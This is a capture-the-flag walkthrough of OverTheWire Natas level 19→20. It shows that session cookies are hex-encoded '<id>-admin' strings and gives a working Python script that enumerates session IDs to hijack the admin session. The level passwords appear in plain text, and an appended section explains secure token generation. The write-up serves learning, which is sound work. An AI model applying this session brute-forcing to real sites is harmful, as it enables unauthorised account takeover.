Natas Level 19 → Level 20

The page starts with a message saying it is pretty much the same code as the previous level, except that the session IDs are no longer sequential. Again, there is a username and a password field for you to log in as admin and retrieve the credentials for natas20. No source code is available. I entered the username admin and the password password and intercepted the traffic using Burp. Let's see what the PHPSESSID looks like in the headers.

PHPSESSID=3534382d61646d696e; path=/; HttpOnly

That's a lot of characters to brute force. However, if you look closely, the session ID looks like hex. I quickly checked what it decodes to in ASCII.

548-admin

That seems a little too good to be true. Notice that I logged in as the user admin, so let's modify our last script to enumerate IDs from 0 to 640 (hopefully $maxid is still the same), append "-admin", convert the whole string to hex, set that as the PHPSESSID and see if we can get the next password.

#!/usr/bin/env python3
import requests
import binascii

def str2byte(s):
    # encode a str as UTF-8 bytes
    return bytes(s, encoding='utf-8')

def byte2hex(b):
    # two lowercase hex digits per byte, e.g. b'5' -> '35'
    return ''.join([hex(n)[2:].rjust(2, '0') for n in b])

def str2hex(s):
    return byte2hex(str2byte(s))

maxid = 641
user = "natas19"
passwd = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs"
url = "http://" + user + ".natas.labs.overthewire.org"
admin = '-admin'
match = "You are an admin. The credentials for the next level are:"

for i in range(maxid):
    # session cookie is hex("<id>-admin"); try every id in turn
    c = dict(PHPSESSID=str2hex(str(i) + admin))
    h = requests.get(url, auth=(user, passwd), cookies=c)
    if match in str(h.content):
        print(h.content)
        break

We got the next password in the page content again (id=501). With the ID at such a high number in the last level, I was tempted to run the range in reverse or use a random generator to pick IDs. However, in real life, unless you have a reason to suspect the ID is not generated uniformly at random, there is no penalty for brute forcing from the lowest number to the highest, because the expected number of guesses is the same ($maxid/2).

eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

In the Python code, I reused code from set 1 of the Matasano crypto challenges. There is documentation on how to convert between binary and ASCII below.
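The weakness here is that the cookie only looks random. As an added example (not code from the original post), the snippet below rebuilds the observed scheme, decodes a captured cookie the way the ASCII check above did, compares the effective keyspace with a CSPRNG token, and checks that a token is at least long enough not to be guessable; the 641 upper bound is the same assumption the walkthrough makes about $maxid.

```python
import binascii
import math
import secrets
from typing import Optional

MAX_ID = 641  # assumed upper bound on the numeric id, as in the walkthrough


def weak_session_id(numeric_id: int, username: str) -> str:
    """Rebuild the observed scheme: hex("<id>-<username>")."""
    return binascii.hexlify(f"{numeric_id}-{username}".encode()).decode()


def decode_session_id(cookie: str) -> Optional[str]:
    """Reverse the hex encoding; None if the cookie is not hex-encoded ASCII."""
    try:
        return binascii.unhexlify(cookie).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def weak_keyspace_bits(max_id: int = MAX_ID) -> float:
    """Once the username is known, only log2(max_id) bits are left to guess."""
    return math.log2(max_id)


def strong_session_id(nbytes: int = 16) -> str:
    """Hardened alternative: an opaque token from a CSPRNG (128 bits for 16 bytes)."""
    return secrets.token_hex(nbytes)


def looks_strong_enough(cookie: str, min_bits: int = 128) -> bool:
    """Sanity check for a hex token: reject anything shorter than min_bits."""
    try:
        raw = bytes.fromhex(cookie)
    except ValueError:
        return False
    return 8 * len(raw) >= min_bits


if __name__ == "__main__":
    captured = "3534382d61646d696e"  # the cookie observed in the walkthrough
    print(decode_session_id(captured))  # 548-admin
    print(f"weak scheme: ~{weak_keyspace_bits():.1f} bits")
    print(f"strong token: {strong_session_id()}")
```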

Additional resources: